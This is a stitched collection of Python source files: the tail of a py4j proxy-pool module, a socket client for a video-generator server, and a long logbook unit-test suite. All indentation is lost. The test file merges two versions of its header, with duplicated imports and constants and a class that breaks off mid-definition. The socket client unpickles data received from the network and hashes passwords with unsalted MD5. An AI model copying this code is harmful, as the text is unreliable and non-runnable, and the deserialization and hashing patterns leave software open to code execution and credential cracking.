except Exception as e:
logger.exception("There was an exception while executing the "
"Python Proxy on the Python Side.")
if self.callback_server_parameters.propagate_java_exceptions and\
isinstance(e, Py4JJavaError):
java_exception = e.java_exception
else:
java_exception = traceback.format_exc()
return proto.RETURN_MESSAGE + proto.ERROR +\
get_command_part(java_exception, self.pool)
def _get_params(self, input):
params = []
temp = smart_decode(input.readline())[:-1]
while temp != proto.END:
param = get_return_value("y" + temp, self.gateway_client)
params.append(param)
temp = smart_decode(input.readline())[:-1]
return params
class PythonProxyPool(object):
"""A `PythonProxyPool` manages proxies that are passed to the Java side.
A proxy is a Python class that implements a Java interface.
A proxy has an internal class named `Java` with a member named
`implements` which is a list of fully qualified names (string) of the
implemented interfaces.
The `PythonProxyPool` implements a subset of the dict interface:
`pool[id]`, `del(pool[id])`, `pool.put(proxy)`, `pool.clear()`,
`id in pool`, `len(pool)`.
The `PythonProxyPool` is thread-safe.
"""
def __init__(self):
self.lock = RLock()
self.dict = {}
self.next_id = 0
def put(self, object, force_id=None):
"""Adds a proxy to the pool.
:param object: The proxy to add to the pool.
:rtype: A unique identifier associated with the object.
"""
with self.lock:
if force_id:
id = force_id
else:
id = proto.PYTHON_PROXY_PREFIX + smart_decode(self.next_id)
self.next_id += 1
self.dict[id] = object
return id
def __getitem__(self, key):
with self.lock:
return self.dict[key]
def __delitem__(self, key):
with self.lock:
del(self.dict[key])
def clear(self):
with self.lock:
self.dict.clear()
def __contains__(self, key):
with self.lock:
return key in self.dict
def __len__(self):
with self.lock:
return len(self.dict)
# Basic registration
register_output_converter(
proto.REFERENCE_TYPE,
lambda target_id, gateway_client: JavaObject(target_id, gateway_client))
if PY4J_SKIP_COLLECTIONS not in os.environ or\
os.environ[PY4J_SKIP_COLLECTIONS].lower() not in PY4J_TRUE:
__import__("py4j.java_collections")
|
generatorclient.py
|
import socket
from threading import Thread
import datetime
import pickle
import hashlib
import youtubequeue
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
last_upload_times = None
isRequestingScripts = False
# Connect the socket to the port where the server is listening
server_address = ('localhost', 11000)
def flagscript(scriptno, flagtype):
print("%s VID GEN CLIENT requesting to flag script" % datetime.datetime.now())
payload = ("flag-scripts", scriptno, flagtype)
sendToServer(sock, payload)
def updateUploadDetails(scriptno, timeuploaded, scedualedrelease):
payload = ("fin-script", scriptno, timeuploaded, scedualedrelease)
sendToServer(sock, payload)
def login(username, password):
payload = ("login-attempt-generator", username, hashlib.md5(password.encode()).hexdigest())
sendToServer(sock, payload)
def getLastUploadedScripts():
print("%s VID GEN CLIENT requesting last uploaded vids" % datetime.datetime.now())
payload = ("last-uploaded",)
sendToServer(sock, payload)
def sendToServer(server, payloadattachment):
payload_attach = pickle.dumps(payloadattachment)
HEADERSIZE = 10
payload = bytes(f"{len(payload_attach):<{HEADERSIZE}}", 'utf-8') + payload_attach
server.sendall(payload)
# change scriptIBuffer to scriptnos
def requestScripts(current_scripts):
global isRequestingScripts
isRequestingScripts = True
print("%s VID GEN CLIENT requesting scripts current (%s)" % (datetime.datetime.now(), current_scripts))
payload = ("video-generator-request-scripts", current_scripts)
sendToServer(sock, payload)
def connectToServer():
print('video generator connecting to %s port %s' % server_address)
try:
sock.connect(server_address)
except ConnectionRefusedError:
input("Could not connect to server. Press enter to continue")
exit()
thread = Thread(target=downloadListenThread)
thread.start()
def downloadListenThread():
global last_upload_times, isRequestingScripts
print("Client listen thread active")
HEADERSIZE = 10
while True:
full_msg = b''
new_msg = True
while True:
try:
buf = sock.recv(2048)
except OSError:
# happens when disconnecting
break
if new_msg:
msglen = int(buf[:HEADERSIZE])
print("%s VID GEN CLIENT new message (%s)" %( datetime.datetime.now(), msglen))
new_msg = False
full_msg += buf
#print("%s VID GEN CLIENT received %s%% (%s/%s)" % (datetime.datetime.now(), round(len(full_msg) / msglen * 100, 2), str(len(full_msg) / 1000000) + "MB", str(msglen / 1000000) + "MB"))
if len(full_msg) - HEADERSIZE == msglen:
print("%s VID GEN CLIENT received full message (%s)" % (datetime.datetime.now(), len(full_msg) - HEADERSIZE))
incomingdata = pickle.loads(full_msg[HEADERSIZE:])
new_msg = True
full_msg = b""
if incomingdata[0] == "login-success":
print("VID GEN LOGIN SUCCESS")
pass
elif incomingdata[0] == "script-send-to-generator":
scripts = incomingdata[1]
print("%s VID GEN CLIENT received %s scripts" % (
datetime.datetime.now(), len(scripts)))
for script in scripts:
youtubequeue.scriptIBuffer.append(script)
youtubequeue.parseScripts()
isRequestingScripts = False
elif incomingdata[0] == "last-uploaded":
last_times = incomingdata[1]
last_upload_times = last_times
print("%s VID GEN CLIENT received last upload times" % (
datetime.datetime.now()))
|
test_logbook.py
|
# -*- coding: utf-8 -*-
from .utils import (
LogbookTestCase,
activate_via_push_pop,
activate_via_with_statement,
capturing_stderr_context,
get_total_delta_seconds,
make_fake_mail_handler,
missing,
require_module,
require_py3,
)
from contextlib import closing, contextmanager
from datetime import datetime, timedelta
from random import randrange
import logbook
from logbook.helpers import StringIO, xrange, iteritems, zip, u
import os
import pickle
import re
import shutil
import socket
import sys
import tempfile
import time
import json
import base64
try:
from gevent import thread
except ImportError:
try:
import thread
except ImportError:
import _thread as thread
import pickle
import shutil
import unittest
import tempfile
import socket
from datetime import datetime, timedelta
from random import randrange
import six
from six import u
import logbook
from .utils import LogbookTestCase, missing, require_module, require_py3, \
make_fake_mail_handler
def _total_seconds(delta):
"""
Replacement for datetime.timedelta.total_seconds() for Python 2.5, 2.6 and 3.1
"""
return (delta.microseconds + (delta.seconds + delta.days * 24 * 3600) * 10**6) / 10**6
test_file = __file__.rstrip('co')
LETTERS = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
class capture_stderr(object):
def __init__(self):
self.original = sys.stderr
__file_without_pyc__ = __file__
if __file_without_pyc__.endswith(".pyc"):
__file_without_pyc__ = __file_without_pyc__[:-1]
LETTERS = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
class _BasicAPITestCase(LogbookTestCase):
def test_basic_logging(self):
with self.thread_activation_strategy(logbook.TestHandler()) as handler:
self.log.warn('This is a warning. Nice hah?')
self.assert_(handler.has_warning('This is a warning. Nice hah?'))
self.assertEqual(handler.formatted_records, [
'[WARNING] testlogger: This is a warning. Nice hah?'
])
def test_extradict(self):
with self.thread_activation_strategy(logbook.TestHandler()) as handler:
self.log.warn('Test warning')
record = handler.records[0]
record.extra['existing'] = 'foo'
self.assertEqual(record.extra['nonexisting'], '')
self.assertEqual(record.extra['existing'], 'foo')
self.assertEqual(repr(record.extra),
'ExtraDict({\'existing\': \'foo\'})')
def test_custom_logger(self):
client_ip = '127.0.0.1'
class CustomLogger(logbook.Logger):
def process_record(self, record):
record.extra['ip'] = client_ip
custom_log = CustomLogger('awesome logger')
fmt = '[{record.level_name}] {record.channel}: ' \
'{record.message} [{record.extra[ip]}]'
handler = logbook.TestHandler(format_string=fmt)
self.assertEqual(handler.format_string, fmt)
with self.thread_activation_strategy(handler):
custom_log.warn('Too many sounds')
self.log.warn('"Music" playing')
self.assertEqual(handler.formatted_records, [
'[WARNING] awesome logger: Too many sounds [127.0.0.1]',
'[WARNING] testlogger: "Music" playing []'
])
def test_handler_exception(self):
class ErroringHandler(logbook.TestHandler):
def emit(self, record):
raise RuntimeError('something bad happened')
with capturing_stderr_context() as stderr:
with self.thread_activation_strategy(ErroringHandler()) as handler:
self.log.warn('I warn you.')
self.assert_('something bad happened' in stderr.getvalue())
self.assert_('I warn you' not in stderr.getvalue())
def test_formatting_exception(self):
def make_record():
return logbook.LogRecord('Test Logger', logbook.WARNING,
'Hello {foo:invalid}',
kwargs={'foo': 42},
frame=sys._getframe())
record = make_record()
with self.assertRaises(TypeError) as caught:
record.message
errormsg = str(caught.exception)
self.assertRegexpMatches(errormsg,
"Could not format message with provided arguments: Invalid (?:format specifier)|(?:conversion specification)|(?:format spec)")
self.assertIn("msg='Hello {foo:invalid}'", errormsg)
self.assertIn('args=()', errormsg)
self.assertIn("kwargs={'foo': 42}", errormsg)
self.assertRegexpMatches(
errormsg,
r'Happened in file .*%s, line \d+' % __file_without_pyc__)
def test_exception_catching(self):
logger = logbook.Logger('Test')
with self.thread_activation_strategy(logbook.TestHandler()) as handler:
self.assertFalse(handler.has_error())
try:
1 / 0
except Exception:
logger.exception()
try:
1 / 0
except Exception:
logger.exception('Awesome')
self.assert_(handler.has_error('Uncaught exception occurred'))
self.assert_(handler.has_error('Awesome'))
self.assertIsNotNone(handler.records[0].exc_info)
self.assertIn('1 / 0', handler.records[0].formatted_exception)
def test_exc_info_tuple(self):
self._test_exc_info(as_tuple=True)
def test_exc_info_true(self):
self._test_exc_info(as_tuple=False)
def _test_exc_info(self, as_tuple):
logger = logbook.Logger("Test")
with self.thread_activation_strategy(logbook.TestHandler()) as handler:
try:
1 / 0
except Exception:
exc_info = sys.exc_info()
logger.info("Exception caught", exc_info=exc_info if as_tuple else True)
self.assertIsNotNone(handler.records[0].exc_info)
self.assertEquals(handler.records[0].exc_info, exc_info)
def test_exporting(self):
with self.thread_activation_strategy(logbook.TestHandler()) as handler:
try:
1 / 0
except Exception:
self.log.exception()
record = handler.records[0]
exported = record.to_dict()
record.close()
imported = logbook.LogRecord.from_dict(exported)
for key, value in iteritems(record.__dict__):
if key[0] == '_':
continue
self.assertEqual(value, getattr(imported, key))
def test_pickle(self):
with self.thread_activation_strategy(logbook.TestHandler()) as handler:
try:
1 / 0
except Exception:
self.log.exception()
record = handler.records[0]
record.pull_information()
record.close()
for p in xrange(pickle.HIGHEST_PROTOCOL):
exported = pickle.dumps(record, p)
imported = pickle.loads(exported)
for key, value in iteritems(record.__dict__):
if key[0] == '_':
continue
imported_value = getattr(imported, key)
if isinstance(value, ZeroDivisionError):
# in Python 3.2, ZeroDivisionError(x) != ZeroDivisionError(x)
self.assert_(type(value) is type(imported_value))
self.assertEqual(value.args, imported_value.args)
else:
self.assertEqual(value, imported_value)
def test_timedate_format(self):
"""
tests the logbook.set_datetime_format() function
"""
FORMAT_STRING = '{record.time:%H:%M:%S} {record.message}'
handler = logbook.TestHandler(format_string=FORMAT_STRING)
handler.push_thread()
logbook.set_datetime_format('utc')
try:
self.log.warn('This is a warning.')
time_utc = handler.records[0].time
logbook.set_datetime_format('local')
self.log.warn('This is a warning.')
time_local = handler.records[1].time
finally:
handler.pop_thread()
# put back the default time factory
logbook.set_datetime_format('utc')
# get the expected difference between local and utc time
t1 = datetime.now()
t2 = datetime.utcnow()
tz_minutes_diff = get_total_delta_seconds(t1 - t2)/60.0
if abs(tz_minutes_diff) < 1:
self.skipTest("Cannot test utc/localtime differences if they vary by less than one minute...")
# get the difference between LogRecord local and utc times
logbook_minutes_diff = get_total_delta_seconds(time_local - time_utc)/60.0
self.assertGreater(abs(logbook_minutes_diff), 1, "Localtime does not differ from UTC by more than 1 minute (Local: %s, UTC: %s)" % (time_local, time_utc))
ratio = logbook_minutes_diff / tz_minutes_diff
self.assertGreater(ratio, 0.99)
self.assertLess(ratio, 1.01)
class BasicAPITestCase_Regular(_BasicAPITestCase):
def setUp(self):
super(BasicAPITestCase_Regular, self).setUp()
self.thread_activation_strategy = activate_via_with_statement
class BasicAPITestCase_Contextmgr(_BasicAPITestCase):
def setUp(self):
super(BasicAPITestCase_Contextmgr, self).setUp()
self.thread_activation_strategy = activate_via_push_pop
class _HandlerTestCase(LogbookTestCase):
def setUp(self):
super(_HandlerTestCase, self).setUp()
self.dirname = tempfile.mkdtemp()
self.filename = os.path.join(self.dirname, 'log.tmp')
def tearDown(self):
shutil.rmtree(self.dirname)
super(_HandlerTestCase, self).tearDown()
def test_file_handler(self):
handler = logbook.FileHandler(self.filename,
format_string='{record.level_name}:{record.channel}:'
'{record.message}',)
with self.thread_activation_strategy(handler):
self.log.warn('warning message')
handler.close()
with open(self.filename) as f:
self.assertEqual(f.readline(),
'WARNING:testlogger:warning message\n')
def test_file_handler_unicode(self):
with capturing_stderr_context() as captured:
with self.thread_activation_strategy(logbook.FileHandler(self.filename)) as h:
self.log.info(u('\u0431'))
self.assertFalse(captured.getvalue())
def test_file_handler_delay(self):
handler = logbook.FileHandler(self.filename,
format_string='{record.level_name}:{record.channel}:'
'{record.message}', delay=True)
self.assertFalse(os.path.isfile(self.filename))
with self.thread_activation_strategy(handler):
self.log.warn('warning message')
handler.close()
with open(self.filename) as f:
self.assertEqual(f.readline(),
'WARNING:testlogger:warning message\n')
def test_monitoring_file_handler(self):
if os.name == "nt":
self.skipTest("unsupported on windows due to different IO (also unneeded)")
handler = logbook.MonitoringFileHandler(self.filename,
format_string='{record.level_name}:{record.channel}:'
'{record.message}', delay=True)
with self.thread_activation_strategy(handler):
self.log.warn('warning message')
os.rename(self.filename, self.filename + '.old')
self.log.warn('another warning message')
handler.close()
with open(self.filename) as f:
self.assertEqual(f.read().strip(),
'WARNING:testlogger:another warning message')
def test_custom_formatter(self):
def custom_format(record, handler):
return record.level_name + ':' + record.message
handler = logbook.FileHandler(self.filename)
with self.thread_activation_strategy(handler):
handler.formatter = custom_format
self.log.warn('Custom formatters are awesome')
with open(self.filename) as f:
self.assertEqual(f.readline(),
'WARNING:Custom formatters are awesome\n')
def test_rotating_file_handler(self):
basename = os.path.join(self.dirname, 'rot.log')
handler = logbook.RotatingFileHandler(basename, max_size=2048,
backup_count=3,
)
handler.format_string = '{record.message}'
with self.thread_activation_strategy(handler):
for c, x in zip(LETTERS, xrange(32)):
self.log.warn(c * 256)
files = [x for x in os.listdir(self.dirname)
if x.startswith('rot.log')]
files.sort()
self.assertEqual(files, ['rot.log', 'rot.log.1', 'rot.log.2',
'rot.log.3'])
with open(basename) as f:
self.assertEqual(f.readline().rstrip(), 'C' * 256)
self.assertEqual(f.readline().rstrip(), 'D' * 256)
self.assertEqual(f.readline().rstrip(), 'E' * 256)
self.assertEqual(f.readline().rstrip(), 'F' * 256)
def test_timed_rotating_file_handler(self):
basename = os.path.join(self.dirname, 'trot.log')
handler = logbook.TimedRotatingFileHandler(basename, backup_count=3)
handler.format_string = '[{record.time:%H:%M}] {record.message}'
def fake_record(message, year, month, day, hour=0,
minute=0, second=0):
lr = logbook.LogRecord('Test Logger', logbook.WARNING,
message)
lr.time = datetime(year, month, day, hour, minute, second)
return lr
with self.thread_activation_strategy(handler):
for x in xrange(10):
handler.handle(fake_record('First One', 2010, 1, 5, x + 1))
for x in xrange(20):
handler.handle(fake_record('Second One', 2010, 1, 6, x + 1))
for x in xrange(10):
handler.handle(fake_record('Third One', 2010, 1, 7, x + 1))
for x in xrange(20):
handler.handle(fake_record('Last One', 2010, 1, 8, x + 1))
files = sorted(
x for x in os.listdir(self.dirname) if x.startswith('trot')
)
self.assertEqual(files, ['trot-2010-01-06.log', 'trot-2010-01-07.log',
'trot-2010-01-08.log'])
with open(os.path.join(self.dirname, 'trot-2010-01-08.log')) as f:
self.assertEqual(f.readline().rstrip(), '[01:00] Last One')
self.assertEqual(f.readline().rstrip(), '[02:00] Last One')
with open(os.path.join(self.dirname, 'trot-2010-01-07.log')) as f:
self.assertEqual(f.readline().rstrip(), '[01:00] Third One')
self.assertEqual(f.readline().rstrip(), '[02:00] Third One')
def test_mail_handler(self):
subject = u('\xf8nicode')
handler = make_fake_mail_handler(subject=subject)
with capturing_stderr_context() as fallback:
with self.thread_activation_strategy(handler):
self.log.warn('This is not mailed')
try:
1 / 0
except Exception:
self.log.exception(u('Viva la Espa\xf1a'))
if not handler.mails:
# if sending the mail failed, the reason should be on stderr
self.fail(fallback.getvalue())
self.assertEqual(len(handler.mails), 1)
sender, receivers, mail = handler.mails[0]
mail = mail.replace("\r", "")
self.assertEqual(sender, handler.from_addr)
self.assert_('=?utf-8?q?=C3=B8nicode?=' in mail)
header, data = mail.split("\n\n", 1)
if "Content-Transfer-Encoding: base64" in header:
data = base64.b64decode(data).decode("utf-8")
self.assertRegexpMatches(data, 'Message type:\s+ERROR')
self.assertRegexpMatches(data, 'Location:.*%s' % __file_without_pyc__)
self.assertRegexpMatches(data, 'Module:\s+%s' % __name__)
self.assertRegexpMatches(data, 'Function:\s+test_mail_handler')
body = u('Viva la Espa\xf1a')
if sys.version_info < (3, 0):
body = body.encode('utf-8')
self.assertIn(body, data)
self.assertIn('\nTraceback (most', data)
self.assertIn('1 / 0', data)
self.assertIn('This is not mailed', fallback.getvalue())
def test_mail_handler_record_limits(self):
suppression_test = re.compile('This message occurred additional \d+ '
'time\(s\) and was suppressed').search
handler = make_fake_mail_handler(record_limit=1,
record_delta=timedelta(seconds=0.5))
with self.thread_activation_strategy(handler):
later = datetime.utcnow() + timedelta(seconds=1.1)
while datetime.utcnow() < later:
self.log.error('Over and over...')
# first mail that is always delivered + 0.5 seconds * 2
# and 0.1 seconds of room for rounding errors makes 3 mails
self.assertEqual(len(handler.mails), 3)
# first mail is always delivered
self.assert_(not suppression_test(handler.mails[0][2]))
# the next two have a supression count
self.assert_(suppression_test(handler.mails[1][2]))
self.assert_(suppression_test(handler.mails[2][2]))
def test_mail_handler_batching(self):
mail_handler = make_fake_mail_handler()
handler = logbook.FingersCrossedHandler(mail_handler, reset=True)
with self.thread_activation_strategy(handler):
self.log.warn('Testing')
self.log.debug('Even more')
self.log.error('And this triggers it')
self.log.info('Aha')
self.log.error('And this triggers it again!')
self.assertEqual(len(mail_handler.mails), 2)
mail = mail_handler.mails[0][2]
pieces = mail.split('Log records that led up to this one:')
self.assertEqual(len(pieces), 2)
body, rest = pieces
rest = rest.replace("\r", "")
self.assertRegexpMatches(body, 'Message type:\s+ERROR')
self.assertRegexpMatches(body, 'Module:\s+%s' % __name__)
self.assertRegexpMatches(body, 'Function:\s+test_mail_handler_batching')
related = rest.strip().split('\n\n')
self.assertEqual(len(related), 2)
self.assertRegexpMatches(related[0], 'Message type:\s+WARNING')
self.assertRegexpMatches(related[1], 'Message type:\s+DEBUG')
self.assertIn('And this triggers it again', mail_handler.mails[1][2])
def test_group_handler_mail_combo(self):
mail_handler = make_fake_mail_handler(level=logbook.DEBUG)
handler = logbook.GroupHandler(mail_handler)
with self.thread_activation_strategy(handler):
self.log.error('The other way round')
self.log.warn('Testing')
self.log.debug('Even more')
self.assertEqual(mail_handler.mails, [])
self.assertEqual(len(mail_handler.mails), 1)
mail = mail_handler.mails[0][2]
pieces = mail.split('Other log records in the same group:')
self.assertEqual(len(pieces), 2)
body, rest = pieces
rest = rest.replace("\r", "")
self.assertRegexpMatches(body, 'Message type:\s+ERROR')
self.assertRegexpMatches(body, 'Module:\s+'+__name__)
self.assertRegexpMatches(body, 'Function:\s+test_group_handler_mail_combo')
related = rest.strip().split('\n\n')
self.assertEqual(len(related), 2)
self.assertRegexpMatches(related[0], 'Message type:\s+WARNING')
self.assertRegexpMatches(related[1], 'Message type:\s+DEBUG')
def test_syslog_handler(self):
to_test = [
(socket.AF_INET, ('127.0.0.1', 0)),
]
if hasattr(socket, 'AF_UNIX'):
to_test.append((socket.AF_UNIX, self.filename))
for sock_family, address in to_test:
with closing(socket.socket(sock_family, socket.SOCK_DGRAM)) as inc:
inc.bind(address)
inc.settimeout(1)
for app_name in [None, 'Testing']:
handler = logbook.SyslogHandler(app_name, inc.getsockname())
with self.thread_activation_strategy(handler):
self.log.warn('Syslog is weird')
try:
rv = inc.recvfrom(1024)[0]
except socket.error:
self.fail('got timeout on socket')
self.assertEqual(rv, (
u('<12>%stestlogger: Syslog is weird\x00') %
(app_name and app_name + u(':') or u(''))).encode('utf-8'))
def test_handler_processors(self):
handler = make_fake_mail_handler(format_string='''\
Subject: Application Error for {record.extra[path]} [{record.extra[method]}]
Message type: {record.level_name}
Location: {record.filename}:{record.lineno}
Module: {record.module}
Function: {record.func_name}
Time: {record.time:%Y-%m-%d %H:%M:%S}
Remote IP: {record.extra[ip]}
Request: {record.extra[path]} [{record.extra[method]}]
Message:
{record.message}
''')
class Request(object):
remote_addr = '127.0.0.1'
method = 'GET'
path = '/index.html'
def handle_request(request):
def inject_extra(record):
record.extra['ip'] = request.remote_addr
record.extra['method'] = request.method
record.extra['path'] = request.path
processor = logbook.Processor(inject_extra)
with self.thread_activation_strategy(processor):
handler.push_thread()
try:
try:
1 / 0
except Exception:
self.log.exception('Exception happened during request')
finally:
handler.pop_thread()
handle_request(Request())
self.assertEqual(len(handler.mails), 1)
mail = handler.mails[0][2]
self.assertIn('Subject: Application Error '
'for /index.html [GET]', mail)
self.assertIn('1 / 0', mail)
def test_regex_matching(self):
test_handler = logbook.TestHandler()
with self.thread_activation_strategy(test_handler):
self.log.warn('Hello World!')
self.assert_(test_handler.has_warning(re.compile('^Hello')))
self.assert_(not test_handler.has_warning(re.compile('world$')))
self.assert_(not test_handler.has_warning('^Hello World'))
def test_custom_handling_test(self):
class MyTestHandler(logbook.TestHandler):
def handle(self, record):
if record.extra.get('flag') != 'testing':
return False
return logbook.TestHandler.handle(self, record)
class MyLogger(logbook.Logger):
def process_record(self, record):
logbook.Logger.process_record(self, record)
record.extra['flag'] = 'testing'
log = MyLogger()
handler = MyTestHandler()
with capturing_stderr_context() as captured:
with self.thread_activation_strategy(handler):
log.warn('From my logger')
self.log.warn('From another logger')
self.assert_(handler.has_warning('From my logger'))
self.assertIn('From another logger', captured.getvalue())
def test_custom_handling_tester(self):
flag = True
class MyTestHandler(logbook.TestHandler):
def should_handle(self, record):
return flag
null_handler = logbook.NullHandler()
with self.thread_activation_strategy(null_handler):
test_handler = MyTestHandler()
with self.thread_activation_strategy(test_handler):
self.log.warn('1')
flag = False
self.log.warn('2')
self.assert_(test_handler.has_warning('1'))
self.assert_(not test_handler.has_warning('2'))
def test_null_handler(self):
with capturing_stderr_context() as captured:
with self.thread_activation_strategy(logbook.NullHandler()) as null_handler:
with self.thread_activation_strategy(logbook.TestHandler(level='ERROR')) as handler:
self.log.error('An error')
self.log.warn('A warning')
self.assertEqual(captured.getvalue(), '')
self.assertFalse(handler.has_warning('A warning'))
self.assert_(handler.has_error('An error'))
def test_test_handler_cache(self):
with self.thread_activation_strategy(logbook.TestHandler()) as handler:
self.log.warn('First line')
self.assertEqual(len(handler.formatted_records),1)
cache = handler.formatted_records # store cache, to make sure it is identifiable
self.assertEqual(len(handler.formatted_records),1)
self.assert_(cache is handler.formatted_records) # Make sure cache is not invalidated without changes to record
self.log.warn('Second line invalidates cache')
self.assertEqual(len(handler.formatted_records),2)
self.assertFalse(cache is handler.formatted_records) # Make sure cache is invalidated when records change
def test_blackhole_setting(self):
null_handler = logbook.NullHandler()
heavy_init = logbook.LogRecord.heavy_init
with self.thread_activation_strategy(null_handler):
def new_heavy_init(self):
raise RuntimeError('should not be triggered')
logbook.LogRecord.heavy_init = new_heavy_init
try:
with self.thread_activation_strategy(null_handler):
logbook.warn('Awesome')
finally:
logbook.LogRecord.heavy_init = heavy_init
null_handler.bubble = True
with capturing_stderr_context() as captured:
logbook.warning('Not a blockhole')
self.assertNotEqual(captured.getvalue(), '')
def test_calling_frame(self):
handler = logbook.TestHandler()
with self.thread_activation_strategy(handler):
logbook.warn('test')
self.assertEqual(handler.records[0].calling_frame, sys._getframe())
def test_nested_setups(self):
with capturing_stderr_context() as captured:
logger = logbook.Logger('App')
test_handler = logbook.TestHandler(level='WARNING')
mail_handler = make_fake_mail_handler(bubble=True)
handlers = logbook.NestedSetup([
logbook.NullHandler(),
test_handler,
mail_handler
])
with self.thread_activation_strategy(handlers):
logger.warn('This is a warning')
logger.error('This is also a mail')
try:
1 / 0
except Exception:
logger.exception()
logger.warn('And here we go straight back to stderr')
self.assert_(test_handler.has_warning('This is a warning'))
self.assert_(test_handler.has_error('This is also a mail'))
self.assertEqual(len(mail_handler.mails), 2)
self.assertIn('This is also a mail', mail_handler.mails[0][2])
self.assertIn('1 / 0',mail_handler.mails[1][2])
self.assertIn('And here we go straight back to stderr',
captured.getvalue())
with self.thread_activation_strategy(handlers):
logger.warn('threadbound warning')
handlers.push_application()
try:
logger.warn('applicationbound warning')
finally:
handlers.pop_application()
def test_dispatcher(self):
logger = logbook.Logger('App')
with self.thread_activation_strategy(logbook.TestHandler()) as test_handler:
logger.warn('Logbook is too awesome for stdlib')
self.assertEqual(test_handler.records[0].dispatcher, logger)
def test_filtering(self):
logger1 = logbook.Logger('Logger1')
logger2 = logbook.Logger('Logger2')
handler = logbook.TestHandler()
outer_handler = logbook.TestHandler()
def only_1(record, handler):
return record.dispatcher is logger1
handler.filter = only_1
with self.thread_activation_strategy(outer_handler):
with self.thread_activation_strategy(handler):
logger1.warn('foo')
logger2.warn('bar')
self.assert_(handler.has_warning('foo', channel='Logger1'))
self.assertFalse(handler.has_warning('bar', channel='Logger2'))
self.assertFalse(outer_handler.has_warning('foo', channel='Logger1'))
self.assert_(outer_handler.has_warning('bar', channel='Logger2'))
def test_null_handler_filtering(self):
logger1 = logbook.Logger("1")
logger2 = logbook.Logger("2")
outer = logbook.TestHandler()
inner = logbook.NullHandler()
inner.filter = lambda record, handler: record.dispatcher is logger1
with self.thread_activation_strategy(outer):
with self.thread_activation_strategy(inner):
logger1.warn("1")
logger2.warn("2")
self.assertTrue(outer.has_warning("2", channel="2"))
self.assertFalse(outer.has_warning("1", channel="1"))
def test_different_context_pushing(self):
h1 = logbook.TestHandler(level=logbook.DEBUG)
h2 = logbook.TestHandler(level=logbook.INFO)
h3 = logbook.TestHandler(level=logbook.WARNING)
logger = logbook.Logger('Testing')
with self.thread_activation_strategy(h1):
with self.thread_activation_strategy(h2):
with self.thread_activation_strategy(h3):
logger.warn('Wuuu')
logger.info('still awesome')
logger.debug('puzzled')
self.assert_(h1.has_debug('puzzled'))
self.assert_(h2.has_info('still awesome'))
self.assert_(h3.has_warning('Wuuu'))
for handler in h1, h2, h3:
self.assertEquals(len(handler.records), 1)
def test_global_functions(self):
with self.thread_activation_strategy(logbook.TestHandler()) as handler:
logbook.debug('a debug message')
logbook.info('an info message')
logbook.warn('warning part 1')
logbook.warning('warning part 2')
logbook.notice('notice')
logbook.error('an error')
logbook.critical('pretty critical')
logbook.log(logbook.CRITICAL, 'critical too')
self.assert_(handler.has_debug('a debug message'))
self.assert_(handler.has_info('an info message'))
self.assert_(handler.has_warning('warning part 1'))
self.assert_(handler.has_warning('warning part 2'))
self.assert_(handler.has_notice('notice'))
self.assert_(handler.has_error('an error'))
self.assert_(handler.has_critical('pretty critical'))
self.assert_(handler.has_critical('critical too'))
self.assertEqual(handler.records[0].channel, 'Generic')
self.assertIsNone(handler.records[0].dispatcher)
def test_fingerscrossed(self):
handler = logbook.FingersCrossedHandler(logbook.default_handler,
logbook.WARNING)
# if no warning occurs, the infos are not logged
with self.thread_activation_strategy(handler):
with capturing_stderr_context() as captured:
self.log.info('some info')
self.assertEqual(captured.getvalue(), '')
self.assert_(not handler.triggered)
# but if it does, all log messages are output
with self.thread_activation_strategy(handler):
with capturing_stderr_context() as captured:
self.log.info('some info')
self.log.warning('something happened')
self.log.info('something else happened')
logs = captured.getvalue()
self.assert_('some info' in logs)
self.assert_('something happened' in logs)
self.assert_('something else happened' in logs)
self.assert_(handler.triggered)
def test_fingerscrossed_factory(self):
handlers = []
def handler_factory(record, fch):
handler = logbook.TestHandler()
handlers.append(handler)
return handler
def make_fch():
return logbook.FingersCrossedHandler(handler_factory,
logbook.WARNING)
fch = make_fch()
with self.thread_activation_strategy(fch):
self.log.info('some info')
self.assertEqual(len(handlers), 0)
self.log.warning('a warning')
self.assertEqual(len(handlers), 1)
self.log.error('an error')
self.assertEqual(len(handlers), 1)
self.assert_(handlers[0].has_infos)
self.assert_(handlers[0].has_warnings)
self.assert_(handlers[0].has_errors)
self.assert_(not handlers[0].has_notices)
self.assert_(not handlers[0].has_criticals)
self.assert_(not handlers[0].has_debugs)
fch = make_fch()
with self.thread_activation_strategy(fch):
self.log.info('some info')
self.log.warning('a warning')
self.assertEqual(len(handlers), 2)
def test_fingerscrossed_buffer_size(self):
logger = logbook.Logger('Test')
test_handler = logbook.TestHandler()
handler = logbook.FingersCrossedHandler(test_handler, buffer_size=3)
with self.thread_activation_strategy(handler):
logger.info('Never gonna give you up')
logger.warn('Aha!')
logger.warn('Moar!')
logger.error('Pure hate!')
self.assertEqual(test_handler.formatted_records, [
'[WARNING] Test: Aha!',
'[WARNING] Test: Moar!',
'[ERROR] Test: Pure hate!'
])
class HandlerTestCase_Regular(_HandlerTestCase):
def setUp(self):
super(HandlerTestCase_Regular, self).setUp()
self.thread_activation_strategy = activate_via_push_pop
class HandlerTestCase_Contextmgr(_HandlerTestCase):
def setUp(self):
super(HandlerTestCase_Contextmgr, self).setUp()
self.thread_activation_strategy = activate_via_with_statement
class AttributeTestCase(LogbookTestCase):
def test_level_properties(self):
self.assertEqual(self.log.level, logbook.NOTSET)
self.assertEqual(self.log.level_name, 'NOTSET')
self.log.level_name = 'WARNING'
self.assertEqual(self.log.level, logbook.WARNING)
self.log.level = logbook.ERROR
self.assertEqual(self.log.level_name, 'ERROR')
def test_reflected_properties(self):
group = logbook.LoggerGroup()
group.add_logger(self.log)
self.assertEqual(self.log.group, group)
group.level = logbook.ERROR
self.assertEqual(self.log.level, logbook.ERROR)
self.assertEqual(self.log.level_name, 'ERROR')
group.level = logbook.WARNING
self.assertEqual(self.log.level, logbook.WARNING)
self.assertEqual(self.log.level_name, 'WARNING')
self.log.level = logbook.CRITICAL
group.level = logbook.DEBUG
self.assertEqual(self.log.level, logbook.CRITICAL)
self.assertEqual(self.log.level_name, 'CRITICAL')
group.remove_logger(self.log)
self.assertEqual(self.log.group, None)
class LevelLookupTest(LogbookTestCase):
def test_level_lookup_failures(self):
with self.assertRaises(LookupError):
logbook.get_level_name(37)
with self.assertRaises(LookupError):
logbook.lookup_level('FOO')
class FlagsTestCase(LogbookTestCase):
